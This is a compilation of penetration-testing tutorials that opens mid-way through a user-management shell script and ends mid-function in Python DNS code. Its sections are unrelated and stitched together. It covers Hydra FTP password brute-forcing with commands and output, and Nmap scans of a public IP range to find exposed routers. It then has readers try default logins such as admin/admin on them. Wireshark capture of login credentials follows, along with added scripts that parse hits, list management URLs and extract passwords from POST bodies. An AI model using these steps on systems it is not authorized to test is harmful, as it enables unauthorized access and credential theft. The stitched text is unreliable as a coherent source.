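        echo "refusing to delete a UID 0 account: $user" >&2; return 3
    fi
    run pkill -u "$user"
    run userdel -r "$user"
}
```

Usage: source the file and call add_standard_user user1 lpadmin to see the plan, then repeat with DO_IT=1 as root to apply it; remove_standard_user user1 reverses it. The UID 0 check matters because a second root-equivalent account (UID 0 with a different name) is easy to overlook when cleaning up test users.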

Crack passwords in Kali Linux with Hydra

For years, experts have warned about the risks of relying on weak passwords to restrict access to data, and this is still a problem. A rule of thumb for passwords is the longer, the better. In this guide I will use FTP as the target service and show how to crack passwords in Kali Linux with Hydra.
Several login cracking tools exist, but few support more than one protocol or parallelized connections; Hydra does both. We've previously covered password cracking using John the Ripper, Wireshark, NMAP and MiTM.
Hydra can be used and compiled cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and OSX.
Currently THC Hydra tool supports the following protocols:
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Supported Platforms

  1. All UNIX platforms (linux, *bsd, solaris, etc.)
  2. Mac OS/X
  3. Windows with Cygwin (both IPv4 and IPv6)
  4. Mobile systems based on Linux, Mac OS/X or QNX (e.g. Android, iPhone, Blackberry 10, Zaurus, iPaq)
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. On Ubuntu it can be installed from the Synaptic package manager. On Kali Linux, it is pre-installed.
For password guessing Hydra needs a list of passwords. There are lots of password lists available. In this example we are going to use the default password list shipped with John the Ripper, another password cracking tool. Other password lists are easy to find online.
This list is pre-installed on Kali Linux at the following location:
/usr/share/john/password.lst
It looks like this
#!comment: This list has been compiled by Solar Designer of Openwall Project,
#!comment: http://www.openwall.com/wordlists/
#!comment:
#!comment: This list is based on passwords most commonly seen on a set of Unix
#!comment: systems in mid-1990's, sorted for decreasing number of occurrences
#!comment: (that is, more common passwords are listed first). It has been
#!comment: revised to also include common website passwords from public lists
#!comment: of "top N passwords" from major community website compromises that
#!comment: occurred in 2006 through 2010.
#!comment:
#!comment: Last update: 2011/11/20 (3546 entries)
123456
12345
password
password1
123456789
12345678
1234567890
Create a copy of that file on your desktop or any other location and remove the comment lines (all the lines above the password 123456). John skips lines starting with "#!comment:" itself, but Hydra would send each of them as a password and waste attempts. Now our word list of passwords is ready and we are going to use it to guess the password of an FTP server.
Here is the simple command with output
root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV 192.168.1.1 ftp
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-05-13 04:32:18
[DATA] 1 task, 1 server, 3546 login tries (l:1/p:3546), ~3546 tries per task
[DATA] attacking service ftp on port 21
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "123456" - 1 of 3546 [child 0]
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "12345" - 2 of 3546 [child 0]
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "password" - 3 of 3546 [child 0]
[21][ftp] host: 192.168.1.1 login: admin password: password
[STATUS] attack finished for 192.168.1.1 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-05-13 04:32:33
root@kali:~#
Check the line "[21][ftp]". It shows the username/password combination that worked for the FTP server. Quite easy!
Now let's take a look at the options. The -t option tells Hydra how many parallel tasks (connections) to run per target. In this case I used 1 because many routers cannot handle multiple connections and would freeze or hang for a short while; to avoid this it is better to do one attempt at a time. The next option is -l, which gives the username or login to use, in this case admin. Next comes the capital -P option, which provides the word list to use; Hydra will take each line as a single password and try it (lowercase -p would give a single password instead).
The -v option is for verbose output and the capital -V option shows every password being tried. Last comes the host/IP address followed by the service to crack.
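Two helpers for the steps above, as an added example that is not part of THC Hydra: one strips John's "#!comment:" header lines from password.lst, the other pulls the confirmed logins out of a saved Hydra run. The Hydra output is a constructed sample in the format shown above (Hydra's own -o FILE option writes the hits to a file directly, but parsing is handy when all you have is a captured log):

```bash
#!/usr/bin/env bash
# Added example, not part of THC Hydra. strip_john_comments prepares
# John's password.lst for Hydra; hydra_hits_csv turns the "[port][service]"
# result lines of a Hydra run into CSV for the next tool. Both samples below
# are constructed (the address is the RFC 1918 one used in the guide).

SAMPLE_JOHN_LIST='#!comment: This list has been compiled by Solar Designer of Openwall Project,
#!comment: http://www.openwall.com/wordlists/
123456
12345
password'

SAMPLE_HYDRA_OUTPUT='[DATA] attacking service ftp on port 21
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "123456" - 1 of 3 [child 0]
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "password" - 3 of 3 [child 0]
[21][ftp] host: 192.168.1.1   login: admin   password: password
[STATUS] attack finished for 192.168.1.1 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found'

# Drop comment and blank lines but keep the order: the list is sorted by
# frequency (most common first), which is the order you want to try online.
strip_john_comments() {
    grep -v -e '^#!comment:' -e '^$'
}

# Emit "host,port,service,login,password" for each result line. Passwords
# containing spaces would need Hydra's -o output instead of this parser.
hydra_hits_csv() {
    awk '
        /^\[[0-9]+\]\[[a-z0-9-]+\]/ {
            s = $1; gsub(/\[|\]/, " ", s); split(s, a, " ")   # "21", "ftp"
            host = ""; login = ""; pass = ""
            for (i = 2; i <= NF; i++) {
                if ($i == "host:")     host  = $(i + 1)
                if ($i == "login:")    login = $(i + 1)
                if ($i == "password:") pass  = $(i + 1)
            }
            printf "%s,%s,%s,%s,%s\n", host, a[1], a[2], login, pass
        }'
}

# Number of real candidates left after stripping the header.
demo_wordlist_count() {
    printf '%s\n' "$SAMPLE_JOHN_LIST" | strip_john_comments | wc -l | tr -d ' '
}

# CSV of hits from the constructed Hydra output.
demo_hits() {
    printf '%s\n' "$SAMPLE_HYDRA_OUTPUT" | hydra_hits_csv
}
```

Usage: strip_john_comments < /usr/share/john/password.lst > password.lst gives the list Hydra should read with -P, and hydra ... | tee hydra.log followed by hydra_hits_csv < hydra.log collects whatever was found.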


Online password guessing with a wordlist is the most basic form of password attack. It works well against devices such as routers, which are often still configured with their default passwords. Against other systems it rarely succeeds unless you are very lucky, and it is noisy: every attempt shows up in the target's logs, and account lockout policies can turn the attempt into a denial of service for the real user.
It is still worth trying early in an engagement because it costs almost nothing, so keep it in your toolkit alongside the other techniques covered here.

Additional tools bundled with THC Hydra

pw-inspector

It reads passwords in and prints those which meet the requirements you give it (such as a minimum length or required character classes), so you can shrink a wordlist to only the passwords a target's password policy would actually allow.


Resources

Source: http://www.thc.org/thc-hydra/

Router Hack � How to hack ADSL router using NMAP

An asymmetric digital subscriber line (DSL or ADSL) modem is a device used to connect a computer or router to a telephone line which provides the digital subscriber line service for connectivity to the Internet, often called DSL or ADSL broadband. In this guide I will show you how to scan an IP range for connected ADSL or DSL modem routers and find ones whose management interface is reachable remotely. This guide applies to Windows, Linux or Mac, so it doesn't matter what your operating system is; you can try the same steps from any of them. The term DSL or ADSL modem is technically used to describe a modem which connects to a single computer, through a USB port, or is installed in a computer's PCI slot. The more common DSL or ADSL router, which combines the functions of a DSL or ADSL modem and a home router, is a standalone device which can be connected to multiple computers through multiple Ethernet ports or an integral wireless access point. Also called a residential gateway, a DSL or ADSL router usually manages the connection and sharing of the DSL or ADSL service in a home or small office network.
Put this together with sniffing plaintext HTTP traffic with Wireshark and you have a nightmare for the users behind that router, as all their passwords and details can be captured very easily.


Installing NMAP

I use Kali Linux which comes with NMAP Preinstalled. If you are using Windows or Mac (or any other flavour of Linux) go to the following website to download and install NMAP.

Linux Installation:

For Ubuntu, Debian or other apt-based systems Nmap is usually available from the default repository. Install Nmap using the following command:
sudo apt-get install nmap
For YUM Based systems such as Redhat, CentOS, install via
sudo yum install nmap
For PACMAN based systems such as Arch Linux, install via
sudo pacman -S nmap

Windows Installation:

For Windows Computers, download installer and run the executable. Link: http://nmap.org/dist/nmap-6.46-setup.exe

Mac Installation:

For Mac users, download installer and install Link: http://nmap.org/dist/nmap-6.46.dmg

Official NMAP site

You can read more about NMAP here: http://nmap.org/

Search for Vulnerable Routers

Now that we have Nmap sorted, we are going to run the following command to scan for ADSL modem routers based on the banner of the web server on port 80. All you need is to pick an IP range; the example below uses 101.53.64.1/24. Scan only ranges you own or have written authorization to test; probing other people's routers is illegal in most jurisdictions.

Search from Linux using command Line

In Linux run the following command:
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped'
In Windows or Mac open Nmap and paste this line:
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG -
Once it has results, search for the word "open" to narrow them down. (-sS needs root or administrator privileges; -n and -Pn skip DNS resolution and host discovery; -T5 is the most aggressive timing template and can miss hosts on slow links, so fall back to -T4 if results look thin.) A typical Linux Nmap run would return output like the lines below (I've changed the IP details, of course):
Host: 101.53.64.3 ()  Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.4 () Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.9 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.19 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.20 () Ports: 80/open/tcp//http//Fortinet VPN|firewall http config/
Host: 101.53.64.23 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.31 () Ports: 80/open/tcp//http?///
Host: 101.53.64.33 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.35 () Ports: 80/open/tcp//http?///
Host: 101.53.64.37 () Ports: 80/open/tcp//http?///
Host: 101.53.64.49 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: 101.53.64.52 () Ports: 80/open/tcp//http?///
Host: 101.53.64.53 () Ports: 80/open/tcp//ssl|http//thttpd/
Host: 101.53.64.58 () Ports: 80/open/tcp//http?///
Host: 101.53.64.63 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.69 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: 101.53.64.73 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.79 () Ports: 80/open/tcp//http//Apache httpd/
Host: 101.53.64.85 () Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.107 () Ports: 80/open/tcp//http?///
Host: 101.53.64.112 () Ports: 80/open/tcp//http?///
Host: 101.53.64.115 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.123 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.129 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.135 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.145 () Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.149 () Ports: 80/open/tcp//http//Microsoft IIS httpd 6.0/
Host: 101.53.64.167 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.170 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.186 () Ports: 80/open/tcp//http?///
Host: 101.53.64.188 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.193 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.202 () Ports: 80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/
Host: 101.53.64.214 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.224 () Ports: 80/open/tcp//http//Allegro RomPager 4.51 UPnP|1.0 (ZyXEL ZyWALL 2)/
This takes a long time (we are, after all, scanning 256 hosts with the command above). Being impatient, I wanted to check whether my Kali Linux machine was actually doing anything. I used the following command in a separate terminal to monitor what my PC was sending, and it was doing a lot:
tcpdump -ni eth0
[Screenshot: Remote Router Hack - Hack ADSL router using NMAP - blackMORE Ops - 3]
That is a lot of connected hosts with TCP port 80 open. Some are marked "tcpwrapped": the TCP handshake completed but the remote side closed the connection without sending any data, so Nmap could not identify the service. Usually a TCP wrapper, firewall or load balancer is dropping the connection, and such a host is unlikely to give you a usable management page.

Search from Windows, Mac or Linux using GUI � NMAP or Zenmap

Assuming you have Nmap installed, open Zenmap, the cross-platform GUI front end for Nmap (available on Kali Linux and similar distributions as well as on Windows and Mac). Paste the following line into the Command field:
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/26 -p80 -oG -
The same scan can be written with the target range spelled out instead of a CIDR mask. Note that the two forms are not identical: 101.53.64.1/26 covers only 101.53.64.0-63, while 1-255 covers the whole /24.
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG -
Press the Scan button and wait a few minutes until the scan finishes.
[Screenshot: Remote Router Hack - Hack ADSL router using NMAP - blackMORE Ops - 4]
Once you have results, you need to find the hosts with open ports. In the results pane:
  1. Click the Services button
  2. Click the http service
  3. Click the Ports/Hosts tab (click the column header twice to sort by state)
As you can see, I have found a few devices with port 80 (http) open.
[Screenshot: Remote Router Hack - Hack ADSL router using NMAP - blackMORE Ops - 5]
It is quite amazing how many devices have their management port exposed to the public Internet.

Access Management Webpage

Pick one at a time. For example try this:
http://101.53.64.3
http://101.53.64.4
http://101.53.64.129
[Screenshot: Remote Router Hack - Hack ADSL router using NMAP - blackMORE Ops - 6]
You get the idea. If a page opens asking for a username and password, try one of the following combinations:
admin/admin
admin/password
admin/pass
admin/secret
If you can find the router's make and model number, you can look up its exact default username and password on this page: http://portforward.com/default_username_password/
Before we finish up, I am sure you were as impatient as I was, since a lot of the routers showed "tcpwrapped", which stopped us from reaching their web management interface. The following command excludes those devices from the results. I have also expanded the search to a broader range using a different subnet mask.
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/22 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped'
This command uses a /22 subnet mask (1,024 addresses) and filters the output twice: it keeps lines containing the word "open" and drops those containing "tcpwrapped". As you can see, I still get a lot of results. (Bear in mind that -T5 is the most aggressive timing template and can miss ports on slow links; drop to -T4 if the results look thin.)
[Screenshot: Remote Router Hack - Hack ADSL router using NMAP - blackMORE Ops - 7]
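The grep pipeline above does the filtering by hand. As an added example that is not part of the original post, the following Python script parses Nmap's grepable (-oG) format properly, undoes the "|" escaping Nmap applies to slashes inside fields, drops tcpwrapped ports, and turns what is left into the management URLs to try next, grouped by the -sV product string. The sample lines are copied from the scan output shown above; the comment header line is constructed.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Sample input: a constructed comment line followed by six lines copied from the
# grepable (-oG) scan output shown above.
SAMPLE_GNMAP = """\
# constructed comment line: -oG files start with a '# Nmap ... scan initiated' header
Host: 101.53.64.3 ()  Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.4 () Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.53 () Ports: 80/open/tcp//ssl|http//thttpd/
Host: 101.53.64.73 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.149 () Ports: 80/open/tcp//http//Microsoft IIS httpd 6.0/
Host: 101.53.64.202 () Ports: 80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/
"""


@dataclass
class PortRecord:
    host: str       # IP address
    hostname: str   # empty when -n was used, as in the scan above
    port: int
    state: str      # open / closed / filtered ...
    proto: str
    service: str    # e.g. "http", "ssl/http", "tcpwrapped"
    version: str    # product string from -sV; may be empty


# "Host: <ip> (<hostname>)  Ports: <entries>"; fields may be separated by spaces or tabs
_HOST_LINE = re.compile(r"^Host:\s+(\S+)\s+\((.*?)\)\s+Ports:\s+(.*)$")


def parse_gnmap(text: str) -> List[PortRecord]:
    """Parse the 'Host: ... Ports: ...' lines of Nmap grepable output.

    Each port entry is port/state/proto/owner/service/rpcinfo/version/ and Nmap
    replaces any '/' inside a field with '|', which is undone here.
    """
    records: List[PortRecord] = []
    for line in text.splitlines():
        m = _HOST_LINE.match(line)
        if not m:
            continue  # comment lines and "Host: x () Status: Up" lines carry no ports
        host, hostname, ports_field = m.groups()
        ports_field = ports_field.split("\t")[0]  # drop a trailing "Ignored State: ..." field
        for entry in ports_field.split(", "):
            fields = entry.split("/")
            if len(fields) < 7:
                continue  # malformed entry
            records.append(PortRecord(
                host=host,
                hostname=hostname,
                port=int(fields[0]),
                state=fields[1],
                proto=fields[2],
                service=fields[4].replace("|", "/"),
                version=fields[6].replace("|", "/"),
            ))
    return records


def filter_open(records: List[PortRecord], exclude_services=("tcpwrapped",)) -> List[PortRecord]:
    """Equivalent of grep 'open' | grep -v 'tcpwrapped': open ports whose service was identified."""
    return [r for r in records if r.state == "open" and r.service not in exclude_services]


def management_urls(records: List[PortRecord]) -> List[str]:
    """URLs to try in a browser; ssl/... services get https, non-default ports stay explicit."""
    urls = []
    for r in filter_open(records):
        scheme = "https" if r.service.startswith("ssl") else "http"
        default_port = 443 if scheme == "https" else 80
        port = "" if r.port == default_port else f":{r.port}"
        urls.append(f"{scheme}://{r.host}{port}/")
    return urls


def group_by_version(records: List[PortRecord]) -> Dict[str, List[str]]:
    """Group reachable hosts by the -sV product string so identical devices can be triaged together."""
    groups: Dict[str, List[str]] = {}
    for r in filter_open(records):
        groups.setdefault(r.version or "(unidentified)", []).append(r.host)
    return groups


if __name__ == "__main__":
    parsed = parse_gnmap(SAMPLE_GNMAP)
    for url in management_urls(parsed):
        print(url)
    for version, hosts in group_by_version(parsed).items():
        print(f"{version}: {', '.join(hosts)}")
```

Feed it a real file with `parse_gnmap(open("scan.gnmap").read())`; the parser also copes with the tab-separated fields and the "Ignored State" suffix that real -oG files contain.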

Website Password hacking using Wireshark

Let's try this on a simple website. I will hide part of the website name (they are nice people and I respect their privacy). For the sake of this guide, everything is shown on a single machine; you should try it between two VirtualBox/VMware/physical machines.
P.S. Note that on a switched network another host's traffic is not normally delivered to your interface (a switch forwards unicast frames only to the destination port), so capturing from a second machine may show nothing unless you use a hub, a mirror (SPAN) port, or are otherwise in the path of the traffic.

Step 1: Start Wireshark and capture traffic

In Kali Linux you can start Wireshark by going to
Application > Kali Linux > Top 10 Security Tools > Wireshark
In Wireshark go to Capture > Interface and tick the interface that applies to you. In my case, I am using a wireless USB card, so I've selected wlan0.
[Screenshot: Website Password hacking using WireShark - blackMORE Ops - 1]
Ideally you can just press the Start button here and Wireshark will start capturing traffic. If you missed it, you can always start a capture by going back to Capture > Interface > Start.
[Screenshot: Website Password hacking using WireShark - blackMORE Ops - 2]

Step 2: Filter captured traffic for POST data

At this point Wireshark is listening to all network traffic and capturing it. I opened a browser and signed in to a website with my username and password. When the authentication process completed and I was logged in, I went back and stopped the capture in Wireshark.
Usually you see a lot of data in Wireshark. However, we are only interested in POST data.

Why POST only?

Because when you type in your username and password and press the Login button, the browser sends a POST request (in short, you are sending data to the remote server).
To filter the capture down to POST requests, type the following into the filter bar:
http.request.method == "POST"
See the screenshot below; it shows one POST event. Note that this only works when the site submits the login form over plain HTTP. If the page uses HTTPS, the request body is encrypted and Wireshark shows only TLS records (filter: tls, or ssl in older versions), with no method or form fields to match on.
[Screenshot: Website Password hacking using WireShark - blackMORE Ops - 3]
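To make the POST filter concrete, here is an added Python example (not part of the original post) that applies the same test to raw request bytes as they appear in Follow TCP Stream: it recognises a POST, decodes an application/x-www-form-urlencoded body, and picks out the fields that look like credentials. The three sample requests are constructed for illustration; the hostname www.example.test, the path /login.php and the form field names are assumptions. The TLS sample shows the failure mode: over HTTPS there is no method and no body to match on.

```python
from urllib.parse import parse_qs
from typing import Dict, Optional, Tuple

# Constructed sample traffic (not a real capture): the three kinds of request you
# meet when following a login's TCP stream. Names and values are assumptions.
SAMPLE_POST = (
    b"POST /login.php HTTP/1.1\r\n"
    b"Host: www.example.test\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 37\r\n"
    b"\r\n"
    b"username=alice&password=s3cr%21t&go=1"
)
SAMPLE_GET = b"GET /index.html HTTP/1.1\r\nHost: www.example.test\r\n\r\n"
# First bytes of a TLS ClientHello: record type 0x16 (handshake), record version 3.1.
# Over HTTPS this is all a sniffer sees: no method, no headers, no form body.
SAMPLE_TLS = b"\x16\x03\x01\x00\x2f\x01\x00\x00\x2b\x03\x03" + b"\x00" * 32

# Substrings that mark a form field as interesting (assumed list, extend as needed)
CREDENTIAL_TOKENS = ("user", "login", "email", "pass", "pwd")

Request = Tuple[str, str, Dict[str, str], bytes]  # method, path, headers, body


def parse_http_request(raw: bytes) -> Optional[Request]:
    """Split a raw request into (method, path, headers, body); None if it is not plaintext HTTP."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None  # no header/body boundary: truncated, or not HTTP at all (e.g. TLS)
    lines = head.split(b"\r\n")
    try:
        method, path, version = lines[0].decode("ascii").split(" ", 2)
    except (UnicodeDecodeError, ValueError):
        return None
    if not version.startswith("HTTP/"):
        return None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    try:
        length = int(headers.get("content-length", str(len(body))))
    except ValueError:
        length = len(body)
    return method, path, headers, body[:length]


def is_post(raw: bytes) -> bool:
    """Same test as the Wireshark display filter http.request.method == "POST"."""
    parsed = parse_http_request(raw)
    return parsed is not None and parsed[0] == "POST"


def extract_form_fields(raw: bytes) -> Dict[str, str]:
    """Decode a urlencoded POST body into field -> value (percent-decoding applied)."""
    parsed = parse_http_request(raw)
    if parsed is None or parsed[0] != "POST":
        return {}
    _, _, headers, body = parsed
    if not headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return {}  # JSON or multipart bodies would need a different decoder
    fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    return {name: values[0] for name, values in fields.items()}


def find_credentials(raw: bytes) -> Dict[str, str]:
    """Return only the fields whose names look like a username or password."""
    return {name: value for name, value in extract_form_fields(raw).items()
            if any(token in name.lower() for token in CREDENTIAL_TOKENS)}


if __name__ == "__main__":
    for label, sample in (("POST", SAMPLE_POST), ("GET", SAMPLE_GET), ("TLS", SAMPLE_TLS)):
        print(label, "is_post:", is_post(sample), "credentials:", find_credentials(sample))
```

The bytes passed in are exactly what Wireshark shows under Follow TCP Stream for the client side; the TLS case returns nothing because the parser never finds an HTTP request line, which is the same reason the http.request.method filter stays empty on an HTTPS login.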

Monday 19 June 2017

Nmap: DNS (part-19)

Force Reverse DNS Resolution
The -R parameter instructs Nmap to always perform reverse DNS resolution on the target IP address.
Usage syntax: nmap -R [target]
# nmap -R 64.13.134.52
Starting Nmap 5.00 ( http://nmap.org ) at 2009-08-13 17:22 Central Daylight Time
Interesting ports on scanme.nmap.org (64.13.134.52):
Not shown: 993 filtered ports
PORT      STATE  SERVICE
25/tcp    closed smtp
53/tcp    open   domain
70/tcp    closed gopher
80/tcp    open   http
110/tcp   closed pop3
113/tcp   closed auth
31337/tcp closed Elite
Nmap done: 1 IP address (1 host up) scanned in 9.38 seconds
Output of an Nmap scan with reverse DNS enabled
By default, Nmap only does reverse DNS for hosts that appear to be online. The -R option is useful when performing reconnaissance on a block of IP addresses, as Nmap will then try to resolve the reverse DNS name of every address in the block. The reverse DNS name can reveal interesting information about a target address (even if the host is offline or blocking Nmap's probes).
Note The -R option can dramatically reduce the performance of a scan.



Disable Reverse DNS Resolution
The -n parameter is used to disable reverse DNS lookups.
Usage syntax: nmap -n [target]
# nmap -n 64.13.134.52
Starting Nmap 5.00 ( http://nmap.org ) at 2009-08-13 17:23 Central Daylight Time
Interesting ports on 64.13.134.52:
Not shown: 993 filtered ports
PORT      STATE  SERVICE
25/tcp    closed smtp
53/tcp    open   domain
70/tcp    closed gopher
80/tcp    open   http
110/tcp   closed pop3
113/tcp   closed auth
31337/tcp closed Elite
Nmap done: 1 IP address (1 host up) scanned in 8.48 seconds
Output of an Nmap scan with reverse DNS disabled
Reverse DNS can significantly slow an Nmap scan. Using the -n option
greatly reduces scanning time, especially when scanning a large number of hosts.
This option is useful if you do not care about the DNS information for the target
system and prefer a scan that produces faster results.




Alternative DNS Lookup Method
The --system-dns option instructs Nmap to use the host system's DNS resolver
instead of its own internal method.
Usage syntax: nmap --system-dns [target]
$ nmap --system-dns scanme.insecure.org
Starting Nmap 5.00 ( http://nmap.org ) at 2009-08-09 21:47 CDT
Interesting ports on scanme.nmap.org (64.13.134.52):
Not shown: 972 closed ports, 26 filtered ports
PORT   STATE SERVICE
53/tcp open  domain
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 19.86 seconds
Output of a Nmap scan using the system DNS resolver



This option is rarely used as it is much slower than the default method. It can,
however, be useful when troubleshooting DNS problems with Nmap.

Note
The system resolver is always used for IPv6 scans, as Nmap (version 5.00 at the time of these examples) had not yet fully implemented its own internal IPv6 resolver.


Manually Specify DNS Server(s)
The --dns-servers option is used to manually specify DNS servers to be queried
when scanning.
Usage syntax: nmap --dns-servers [server1,server2,etc] [target]
$ nmap --dns-servers 208.67.222.222,208.67.220.220 scanme.insecure.org
Starting Nmap 5.00 ( http://nmap.org ) at 2009-08-09 22:40 CDT
Interesting ports on scanme.nmap.org (64.13.134.52):
Not shown: 998 closed ports
PORT   STATE SERVICE
53/tcp open domain
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 32.07 seconds
Manually specifying DNS servers


Nmap's default behavior is to use the DNS servers configured on your local system
for name resolution. The --dns-servers option lets you specify one or more
alternative servers for Nmap to query. This can be useful on systems that do not
have DNS configured, or if you want to prevent your scan lookups from appearing in
your locally configured DNS server's log file (the queries will, of course, show up
in the alternative server's logs instead).
Note This option is not available for IPv6 scans as of Nmap 5.00, the version used in these examples.
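As an added example that is not part of the original guide, the following Python code shows what Nmap's internal resolver actually sends and receives for each address when -R is in effect, why the name it asks for differs between IPv4 (in-addr.arpa) and IPv6 (nibble-reversed ip6.arpa), and how a direct query to a chosen server in the style of --dns-servers works. resolve_ptr sends the query over UDP; its default server 208.67.222.222 is the OpenDNS address from the --dns-servers example above. build_ptr_response constructs a server reply so the parser can be exercised offline; the IP and hostname in the samples are the page's own scanme.nmap.org values, and the transaction ID 0x1234 is an assumption.

```python
import ipaddress
import secrets
import socket
import struct
from typing import List, Optional, Tuple

PTR, IN = 12, 1  # RR type PTR, class IN


def reverse_name(ip: str) -> str:
    """Owner name of the PTR record Nmap has to ask for, for either address family."""
    return ipaddress.ip_address(ip).reverse_pointer


def _encode_name(name: str) -> bytes:
    """Wire-format name: length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_ptr_query(ip: str, txid: int) -> bytes:
    """One PTR question with recursion desired: what nmap -R sends once per address."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + _encode_name(reverse_name(ip)) + struct.pack("!HH", PTR, IN)


def build_ptr_response(query: bytes, hostname: str, ttl: int = 3600) -> bytes:
    """Constructed server reply for offline testing: echoes the question and answers with one
    PTR record whose name is a compression pointer (0xC00C) back to the question name."""
    txid = struct.unpack("!H", query[:2])[0]
    question = query[12:]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR, RD, RA set; NOERROR
    rdata = _encode_name(hostname)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", PTR, IN, ttl, len(rdata)) + rdata
    return header + question + answer


def _read_name(data: bytes, offset: int) -> Tuple[str, int]:
    """Decode a possibly compressed name; returns (name, offset just past it in the stream)."""
    labels, end, hops = [], None, 0
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:  # compression pointer to an earlier name
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            if end is None:
                end = offset + 2
            offset = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            continue
        if length == 0:
            offset += 1
            break
        labels.append(data[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length
    return ".".join(labels), end if end is not None else offset


def parse_ptr_response(data: bytes, expected_txid: Optional[int] = None) -> List[str]:
    """Return the PTR names in a reply. The transaction ID is the resolver's main defence
    against a spoofed answer, so a mismatch is an error rather than silently ignored."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    if expected_txid is not None and txid != expected_txid:
        raise ValueError("transaction ID mismatch: reply does not belong to our query")
    if flags & 0x000F != 0:  # RCODE: NXDOMAIN, SERVFAIL, ...
        return []
    offset = 12
    for _ in range(qdcount):
        _, offset = _read_name(data, offset)
        offset += 4  # skip QTYPE and QCLASS
    names = []
    for _ in range(ancount):
        _, offset = _read_name(data, offset)
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        if rtype == PTR:
            names.append(_read_name(data, offset)[0])
        offset += rdlen
    return names


def resolve_ptr(ip: str, server: str = "208.67.222.222", timeout: float = 2.0) -> Optional[List[str]]:
    """Query a server of your choice directly over UDP (what --dns-servers does), bypassing
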